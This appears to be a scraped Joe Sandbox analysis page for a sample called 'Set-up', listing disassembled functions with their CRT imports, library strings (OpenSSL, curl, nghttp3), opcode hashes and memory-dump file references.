Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: memcpymemsetstrlen
String ID: Enter PEM pass phrase:$PEM_def_callback$crypto/pem/pem_lib.c
API String ID: 160209724-3271887637
Opcode ID: 90d9e8ec41bbb7ce5b0537b1d1dcc6fcf4724c789496111ea63ca07bdfd7a2ca
Instruction ID: 6ab2fb17f62b1793c516bea7c67842b28ca1569af419c41289bb59aa8d46a6e7
Opcode Fuzzy Hash: 90d9e8ec41bbb7ce5b0537b1d1dcc6fcf4724c789496111ea63ca07bdfd7a2ca
Instruction Fuzzy Hash: BB01F9A27042103BE12079646C83F7B6A8CCBC17A4F040535FE14921C2FE51EC0952B2

Function 008A8920 Relevance: 9.0, APIs: 6, Instructions: 45COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008A895D
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 008A8991
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 008A899A
_write.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 008A89AB
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008A89B4
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 008A89B9

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: __acrt_iob_func_fileno_writeabortfreemalloc
String ID:
API String ID: 1064163434-0
Opcode ID: 983199f422e571383ac75fdf50c77b970d704799ce9f8e0aa1f1628bb791fc6e
Instruction ID: 4d622e9834f99ed53d1520c350ed96d0f52eeffeef657060c1eea57b4d68ac18
Opcode Fuzzy Hash: 983199f422e571383ac75fdf50c77b970d704799ce9f8e0aa1f1628bb791fc6e
Instruction Fuzzy Hash: 7B1183B44093119FD300AF2AC58462AFAE4BF89740F45881DE5C493311EB7498458B63

Function 00B88920 Relevance: 9.0, APIs: 6, Instructions: 30COMMON

Download Yara Rule

APIs

_initialize_narrow_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00B88928
_configure_narrow_argv.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,0080115A), ref: 00B8893D
__p___argc.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,0080115A), ref: 00B88942
__p___argv.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,0080115A), ref: 00B8894F
__p__environ.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,0080115A), ref: 00B8895C
_set_new_mode.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,0080115A), ref: 00B88972

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: __p___argc__p___argv__p__environ_configure_narrow_argv_initialize_narrow_environment_set_new_mode
String ID:
API String ID: 3593706420-0
Opcode ID: 1efc63e94736ec762dde092320e3d59adf545601741b22b2780315d7096a2df3
Instruction ID: 1e437abdf192b325fc2ce43094dbe64a941acb431881dc0ad6ef84cab0688923
Opcode Fuzzy Hash: 1efc63e94736ec762dde092320e3d59adf545601741b22b2780315d7096a2df3
Instruction Fuzzy Hash: 81F0B2786147408FC710BF78C48181A77E1EF9A318F904AA8F9909B3B6DB35E941DF52

Function 008645C0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 259COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000000,?,?,00835B6B,00000017,?,?), ref: 00864612
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789abcdef,?,00000011), ref: 00864660

Strings

0123456789ABCDEF, xrefs: 00864683, 00864694
0123456789abcdef, xrefs: 0086465B, 0086466C

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: _errnomemchr
String ID: 0123456789ABCDEF$0123456789abcdef
API String ID: 4119152314-885041942
Opcode ID: 4081315b5fbeb01c332febba6b45b01ca678a9e64429da349662568771f21726
Instruction ID: 6a7e7fcd69e192e66f82386eb2bbd480240059352770c1289846afb6e215b853
Opcode Fuzzy Hash: 4081315b5fbeb01c332febba6b45b01ca678a9e64429da349662568771f21726
Instruction Fuzzy Hash: 4D911471A083498BD728DE29C8402BEB7D2FFD6314F1A9A2DE8D5C7381DB759D848742

Function 00852250 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0085225F
_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 008522CF

Strings

:%u, xrefs: 00852290, 00852363
Hostname in DNS cache does not have needed family, zapped, xrefs: 008523EF, 008523FE
Hostname in DNS cache was stale, zapped, xrefs: 00852322

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: _time64strlen
String ID: :%u$Hostname in DNS cache does not have needed family, zapped$Hostname in DNS cache was stale, zapped
API String ID: 3014104814-1335658360
Opcode ID: 729110da5c4d90eed4cbbb39c84542f3f7e7b8564e91e970ab28564e48741fcc
Instruction ID: f1ec0f97b4087c26a0c9855ba1c62eee5da2b8a0b8dfdcd275e77e94ed078d8d
Opcode Fuzzy Hash: 729110da5c4d90eed4cbbb39c84542f3f7e7b8564e91e970ab28564e48741fcc
Instruction Fuzzy Hash: A44105716003045BD724AA28DC85BBBB7D5FF85315F08443CEE8AC7392EA35AC49C752

Function 008B06F0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 117COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ctx->next_absidx > absidx,nghttp3_qpack.c,000008B6,?,?,008B0307,?), ref: 008B07AE
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable),nghttp3_qpack.c,000008B7,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008B07C3

Strings

ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable), xrefs: 008B07BE
ctx->next_absidx > absidx, xrefs: 008B07A9
nghttp3_qpack.c, xrefs: 008B07A4, 008B07B9

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: _assert
String ID: ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable)$ctx->next_absidx > absidx$nghttp3_qpack.c
API String ID: 1222420520-241347991
Opcode ID: 0e2f33c2a4d3aa26273d6ec9757a40351b3afe5905d45aaa900130ae8c0cbde1
Instruction ID: b5fb6382032dbde28c2b9db1397530435284d44c8da0a64f2f03cbd2693af17f
Opcode Fuzzy Hash: 0e2f33c2a4d3aa26273d6ec9757a40351b3afe5905d45aaa900130ae8c0cbde1
Instruction Fuzzy Hash: 5E31D375700704AFE310AA68DC81E6BB395FF89714F04852CF44AD7782EB21B8458BE2

Function 00B84610 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 116fileCOMMON

Download Yara Rule

APIs

_stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00815FB6,?), ref: 00B84645
_stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(../list/public_suffix_list.dat,?), ref: 00B84698
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00DF2358), ref: 00B84744
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00B84762

Strings

../list/public_suffix_list.dat, xrefs: 00B84693, 00B846B9, 00B846F5

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: _stat64$fclosefopen
String ID: ../list/public_suffix_list.dat
API String ID: 1085753941-141370353
Opcode ID: e4b14bb77fa66c99a27a732ea3517ef152138eea4fe3d1632f5e48add9af53c1
Instruction ID: 36f5fd99eebd04823828dacb5beb1f2a9747b6e8442bdaa8c543f627350cf5c2
Opcode Fuzzy Hash: e4b14bb77fa66c99a27a732ea3517ef152138eea4fe3d1632f5e48add9af53c1
Instruction Fuzzy Hash: F1419EB6A083469BC700EF14D48176AB7E5EB85744F15486CE9C9D7360E7B0ED48CB92

Function 008AE990 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 102COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(nghttp3_ksl_it_get(&it) == stream,nghttp3_qpack.c,000008ED,?,?,?,?,?,?,?,00000000,00000000,00000000,?,008AEF0E,?), ref: 008AEA23
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(!nghttp3_ksl_it_end(&it),nghttp3_qpack.c,000008EC,?,?,?,?,?,?,?,00000000,00000000,00000000,?,008AEF0E,?), ref: 008AEA38

Strings

nghttp3_ksl_it_get(&it) == stream, xrefs: 008AEA1E
nghttp3_qpack.c, xrefs: 008AEA19, 008AEA2E
!nghttp3_ksl_it_end(&it), xrefs: 008AEA33

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: _assert
String ID: !nghttp3_ksl_it_end(&it)$nghttp3_ksl_it_get(&it) == stream$nghttp3_qpack.c
API String ID: 1222420520-1964160224
Opcode ID: 9e453f72b92eda769cf1982cf1ed08b87a39ecd69a59f284b3ac5ca4a7faf0e2
Instruction ID: 72496dc25d9cdf757fba2c5fe1a8285993f5747b22a3ef4719015d6549829a53
Opcode Fuzzy Hash: 9e453f72b92eda769cf1982cf1ed08b87a39ecd69a59f284b3ac5ca4a7faf0e2
Instruction Fuzzy Hash: 1131D372804709EFD714DF54DC81E9BB7B8FF96364F008919F8989B291E730A984C7A2

Function 00872680 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 98COMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00872771

Strings

Connection time-out, xrefs: 008726CD
gfff, xrefs: 008726EE
set timeouts for state %d; Total % lld, retry %d maxtry %d, xrefs: 00872761
netascii, xrefs: 00872680

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: _time64
String ID: Connection time-out$gfff$netascii$set timeouts for state %d; Total % lld, retry %d maxtry %d
API String ID: 1670930206-2395985473
Opcode ID: 3057cfff9ff55e797ed8ed89752a1ba0c24313f1aea0baf578b8e442f3a6cdf2
Instruction ID: 05740073cc18dc1c149e9bb63deb43e8af8bc42d290a0de3fe579be7580d302b
Opcode Fuzzy Hash: 3057cfff9ff55e797ed8ed89752a1ba0c24313f1aea0baf578b8e442f3a6cdf2
Instruction Fuzzy Hash: 0021EAB1B003045FEB28AA29AD05B2775DAFBD4304F18853DF90EC72D6F975D8118752

Function 008A6010 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(veccnt > 0,nghttp3_stream.c,0000033D), ref: 008A6119
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(0 == offset,nghttp3_stream.c,00000349), ref: 008A612E

Strings

veccnt > 0, xrefs: 008A6114
nghttp3_stream.c, xrefs: 008A610F, 008A6124
0 == offset, xrefs: 008A6129

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: _assert
String ID: 0 == offset$nghttp3_stream.c$veccnt > 0
API String ID: 1222420520-3888743547
Opcode ID: 41c1061a981dc9ebf74f15fed5ca8cbaeb408464165674c2519f203a48459f99
Instruction ID: 6886f2567f9e4a7cae4e59e69cd7353c501c70fe4163cb511eb7ca1abfba6d44
Opcode Fuzzy Hash: 41c1061a981dc9ebf74f15fed5ca8cbaeb408464165674c2519f203a48459f99
Instruction Fuzzy Hash: F1314971900304CFD704EF18D885A66B7E0FF85318F09857CE88DA7751E671AD95CB92

Function 008A87E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 61COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(n <= balloc->blklen,nghttp3_balloc.c,00000042,?,00000000,?,008A4D5A,00000000,?,000001F0), ref: 008A8861
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(((uintptr_t)balloc->buf.last & 0xfu) == 0,nghttp3_balloc.c,00000055,?,000001F0), ref: 008A8873

Strings

nghttp3_balloc.c, xrefs: 008A8857, 008A8869
n <= balloc->blklen, xrefs: 008A885C
((uintptr_t)balloc->buf.last & 0xfu) == 0, xrefs: 008A886E

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: _assert
String ID: ((uintptr_t)balloc->buf.last & 0xfu) == 0$n <= balloc->blklen$nghttp3_balloc.c
API String ID: 1222420520-3025919285
Opcode ID: 52ff45afd6fdae75a7495a2b573c1bb8d799289f25c94d4ad4719de795204b04
Instruction ID: 7abb95db9c02e064d8afe0d26ea68f373416933e9d263e700b13f45e3ef15f6b
Opcode Fuzzy Hash: 52ff45afd6fdae75a7495a2b573c1bb8d799289f25c94d4ad4719de795204b04
Instruction Fuzzy Hash: 7F11C2B6A44601EFE6008F29EC41A59B364FB42731B044625F818E76D2DB24E8648BF5

Function 00804810 Relevance: 8.0, APIs: 3, Strings: 2, Instructions: 484COMMON

Download Yara Rule

Strings

application/octet-stream, xrefs: 00804DE3
formdata.c, xrefs: 0080481F, 00804C8D, 00804DEB, 00804F36, 00804FF3, 00805081, 008050AB, 008050E6, 00805116, 00805161, 0080518B, 008051C6, 008051F6

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID:
String ID: application/octet-stream$formdata.c
API String ID: 0-1216067158
Opcode ID: abcda446a920d8f559dc1f1adaef9508445620c066f55849a65a79ab907f66ac
Instruction ID: 876125a04a51b452034273aa5b68d24d7ac07a36a9847d5c9b54707457b955c4
